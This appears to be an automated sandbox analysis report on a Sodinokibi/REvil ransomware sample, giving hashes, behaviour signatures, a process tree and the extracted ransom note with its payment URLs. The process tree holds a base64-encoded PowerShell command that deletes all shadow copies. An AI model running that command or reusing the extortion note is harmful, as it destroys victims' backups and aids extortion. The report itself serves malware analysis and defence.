Analysis

  • max time kernel
    130s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    05-03-2022 15:48

General

  • Target

    cc7540b0a93698968c73656699cff5e98e3ef7e264884bf75efdd08293beb74c.exe

  • Size

    115KB

  • MD5

    ef4b35fa259ef96b6901a5d39c9d95b1

  • SHA1

    5e41e972d3e017aee1adc56ab24e1a72e33993e9

  • SHA256

    cc7540b0a93698968c73656699cff5e98e3ef7e264884bf75efdd08293beb74c

  • SHA512

    e1f875e4cf145b089d9c884150407f15bd5ed4ccab28513443695702d84857d0ae8e3f1222f0ce7c05fa6f5d508e42627b8b495c968c2fb651fadb62cb7a4393

Score
10/10

Malware Config

Extracted

Path

C:\n4rm28l-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension n4rm28l. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3B81F287ED31570A 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/3B81F287ED31570A Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: a2gRVADbeeUQ8li/evHjz86zunQo72hqRY47z1t9qPd27eDf1rQSxZfd+KHOO8xZ TeYWYmWb0h4yhBWUSZromoPavUfIKrqjmNjP+vHUSFV28EBOLeOcCL3POvJbTtIL vMNaS0Ye8GZfY5ekefmvjmvJAHO7tdwmg3p82hPWVxBsk4n+K81w5XzFAezI/BuB o4IOLjMgiJnYNYqPiyT5iLvd44iQTDsuYlTrxGS3GXPqKNXRR53k0qqcY46QM1uc KTldEn79/cPrcPcW/0xUHt3Iz4u3rikgrR10zRBHcbU9eqPgJnjrax27/gYqPYci Iz4Vpk36XnxAN7WODLTlRbadnPHUxFdNEEZEOwFKA9WxV0dxn9vRyWWuyq5xqgzr izFJo5luMBf3V64qS3ZwnPrPLoRt0wDeG2IeNy5ElBXY3ifzL/U24VCk0vZ1WFQi gBBKT/xsRPYbniozyDd2vTqMy2AQohaRXNO08agKIxJeM7uS3Wj99LE34MMrZDwj TgQYoccAo9r67prhPWBOBnWP3Svb8Xb70vsH56cZB4GU0xbbbyS1fsYwGXpMmK6Q O0J4WkrX8z7KvZUkUK8C3EdjL+73f8UlG1edCMCHxHw7GkWfyyJmb+8zfwKBoa6Z 7e9Q+pIZ2gXeCN496xIZCPayFs2bICV6O9N3nHcrU8DTNLOSxnNaizeA47rSt2M0 M3kgiZxDnlunXzI60/YklzQgKY4zn6caVtWqzYLa4MeLI1zO6z4BURU4c1E/+Qsl 12v160/a5pLSTvnVT76H0+kg3691BBapCd/8xt20GDvbluS0ZVRlZKNpwz+YpdDI 7VcfImyOGSXe4LkQ8vryM27eNv4fOffZD7ukKOugUEXMSqClf3gWtqtYF+HE5h9d bQ9daUxLMchoBDr3uxSA2vwI+ishXzTt0QoLKaEvjrbMINh2o19fbIh7wtD0UgHA oc+OXM9p8ziuo33k2CtvpyhiaWnjcasSeIdLdcolThaDeLRBx7V6Ukwp6gHAjMZ0 3p4FZ6CrDEb7uiW8OdCnL32s9yRRLSWp//kAV8sRpB/udqvymmkJPQ+BvTnNKo4h BGZgQ51K6DnLU59aCdUkO7IqwMZxpR/HeM06x7VqtXCSH1Q+vZh0Ii5pExoU/SmN EtV2n86Pz9QPYnOTgP+ADPUTeOSJmnSVFvG8yg77fVJMnaImMsYJWWyhBY1cx+ql cZFfzEJX6Y1IZE1ceFfpyo1sxYo/B+RHyK+LPhPSqOqNafXfUCs8uQgp5lpevmpY 6nf2iJICz8XH7XESnfq5xRNamvhmQoubcUA= Extension name: n4rm28l ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3B81F287ED31570A

http://decryptor.cc/3B81F287ED31570A

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 32 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cc7540b0a93698968c73656699cff5e98e3ef7e264884bf75efdd08293beb74c.exe
    "C:\Users\Admin\AppData\Local\Temp\cc7540b0a93698968c73656699cff5e98e3ef7e264884bf75efdd08293beb74c.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1684
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1548
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1256
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:432

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1548-56-0x000007FEFB5B1000-0x000007FEFB5B3000-memory.dmp
      Filesize

      8KB

    • memory/1548-57-0x000007FEF2810000-0x000007FEF336D000-memory.dmp
      Filesize

      11.4MB

    • memory/1548-58-0x000000001B720000-0x000000001BA1F000-memory.dmp
      Filesize

      3.0MB

    • memory/1548-59-0x000007FEF4C80000-0x000007FEF561D000-memory.dmp
      Filesize

      9.6MB

    • memory/1548-60-0x000000000240B000-0x000000000242A000-memory.dmp
      Filesize

      124KB

    • memory/1548-61-0x0000000002400000-0x0000000002402000-memory.dmp
      Filesize

      8KB

    • memory/1548-62-0x000007FEF4C80000-0x000007FEF561D000-memory.dmp
      Filesize

      9.6MB

    • memory/1548-64-0x0000000002404000-0x0000000002407000-memory.dmp
      Filesize

      12KB

    • memory/1548-63-0x0000000002402000-0x0000000002404000-memory.dmp
      Filesize

      8KB

    • memory/1684-55-0x0000000075AB1000-0x0000000075AB3000-memory.dmp
      Filesize

      8KB